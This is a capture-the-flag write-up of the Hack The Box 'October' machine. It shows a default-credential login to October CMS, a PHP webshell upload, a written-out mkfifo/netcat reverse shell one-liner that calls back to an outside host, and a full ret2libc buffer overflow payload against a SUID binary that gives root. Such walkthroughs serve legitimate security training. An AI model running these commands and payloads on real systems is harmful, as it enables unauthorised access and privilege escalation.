HTB - October

October

Getting Root:

1. The box is running October CMS and we can login using admin:admin

2. Navigating to /backend/cms/media allows us to upload php files and we can get a reverse shell

3. Enumerating the box shows an interesting executable with the suid bit which is vulnerable to buffer overflow

Tools Used:

nmap, dirsearch.py, nc, gdb (with the peda extension)

Nmap

# nmap -sC -sV -p- -oA nmap/October 10.10.10.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 23:54 EDT
Nmap scan report for 10.10.10.16
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.61 seconds

Enumeration

Dirsearch.py

sudo /opt/dirsearch/dirsearch.py -u http://10.10.10.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -E                               
[sudo] password for kali: 
                                               
 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 220521
                                                                                               
Error Log: /opt/dirsearch/logs/errors-20-04-01_23-58-08.log
                                               
Target: http://10.10.10.16
                                               
[23:58:08] Starting:       
[23:58:10] 200 -    5KB - /    
[23:58:21] 200 -    4KB - /blog                                                                
[23:58:32] 301 -  310B  - /themes  ->  http://10.10.10.16/themes/
[23:58:33] 200 -    9KB - /forum                                                               
[23:58:37] 301 -  311B  - /modules  ->  http://10.10.10.16/modules/
[23:59:52] 200 -    5KB - /account                                                             
[00:00:08] 301 -  309B  - /tests  ->  http://10.10.10.16/tests/    
[00:00:10] 301 -  311B  - /storage  ->  http://10.10.10.16/storage/
[00:00:18] 301 -  311B  - /plugins  ->  http://10.10.10.16/plugins/            
[00:01:30] 302 -  400B  - /backend  ->  http://10.10.10.16/backend/backend/auth
[00:02:42] 200 -    4KB - /Blog                                                                
[00:04:38] 301 -  310B  - /vendor  ->  http://10.10.10.16/vendor/
[00:04:40] 301 -  310B  - /config  ->  http://10.10.10.16/config/
[00:08:45] 200 -    9KB - /Forum
[00:10:14] 200 -    3KB - /error  

Navigating to /backend redirect us to http://10.10.10.16/backend/backend/auth

We can login with admin:admin and the application allows us to upload php files. I uploaded a webshell and was able to get a shell.

By clicking on the hyperlink, the application open the location of the webshell in anew tab.

Now we can get a reverse shell using netcat.

Exploitation

# I tried with the -e but it failed, so I used the workaround
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f


# On my Kali box
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.16.
Ncat: Connection from 10.10.10.16:40314.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

Privilege Escalation

There is binary with the suid set /usr/local/bin/ovrflw

www-data@october:/$ find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
267491   68 -rwsr-xr-x   1 root     root        67704 Nov 24  2016 /bin/umount
262216   40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
266648   32 -rwsr-xr-x   1 root     root        30112 May 15  2015 /bin/fusermount
262222   36 -rwsr-xr-x   1 root     root        35300 May 17  2017 /bin/su
262217   44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
267489   88 -rwsr-xr-x   1 root     root        88752 Nov 24  2016 /bin/mount
928759    8 -rwsr-xr-x   1 root     root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
1053687  484 -rwsr-xr-x   1 root     root       492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
931266   12 -rwsr-xr-x   1 root     root         9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
395450  328 -rwsr-xr--   1 root     messagebus   333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
917774  156 -rwsr-xr-x   1 root     root       156708 Oct 14  2016 /usr/bin/sudo
922948   32 -rwsr-xr-x   1 root     root        30984 May 17  2017 /usr/bin/newgrp
931257   20 -rwsr-xr-x   1 root     root        18168 Nov 24  2015 /usr/bin/pkexec
922277   48 -rwsr-xr-x   1 root     root        45420 May 17  2017 /usr/bin/passwd
922274   44 -rwsr-xr-x   1 root     root        44620 May 17  2017 /usr/bin/chfn
921702   68 -rwsr-xr-x   1 root     root        66284 May 17  2017 /usr/bin/gpasswd
930650   20 -rwsr-xr-x   1 root     root        18136 May  8  2014 /usr/bin/traceroute6.iputils
930677   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
921701   36 -rwsr-xr-x   1 root     root        35916 May 17  2017 /usr/bin/chsh
930939   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
930733  316 -rwsr-xr--   1 root     dip        323000 Apr 21  2015 /usr/sbin/pppd
928820   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Nov 24  2016 /usr/sbin/uuidd
664031    8 -rwsr-xr-x   1 root     root         7377 Apr 21  2017 /usr/local/bin/ovrflw

Let's try to see if we can exploit this binary by overriding EIP by sending a unique pattern and finding the offset using gdb with peda extension.

Creating a unique pattern of 500 bytes using pattern_create 500

We noticed EIP got overridden by pattern 'AA8A'

Finding the offset using pattern_offset AA8A we can see the offset is 112

Finding the address of libc

www-data@october:/usr/local/bin$ ldd /usr/local/bin/ovrflw | grep libc
ldd /usr/local/bin/ovrflw | grep libc
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7610000)

libc.so.6: b7610000

Finding the offset the system, exit and /bin/sh

www-data@october:/usr/local/bin$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"  
<-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"                       
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
  
  
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/" 
</bin$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/"          
 162bac /bin/sh

system: b7650310 (b7610000 + 40310) exit: b7643260 (b7610000 + 33260) /bin/sh: b7772bac (b7610000 + 162bac)

Converting them to little endian, we have: system: \x10\x03\x65\xb7 exit: \x60\x32\x64\xb7 /bin/sh: \xac\x2b\x77\xb7

Therefore we can try to execute the exploit as follows:

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done   

Root

www-data@october:/$ while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done    
<7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done                        
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbf946e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Trace/breakpoint trap (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': free(): invalid pointer: 0x08048380 ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbfb07e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)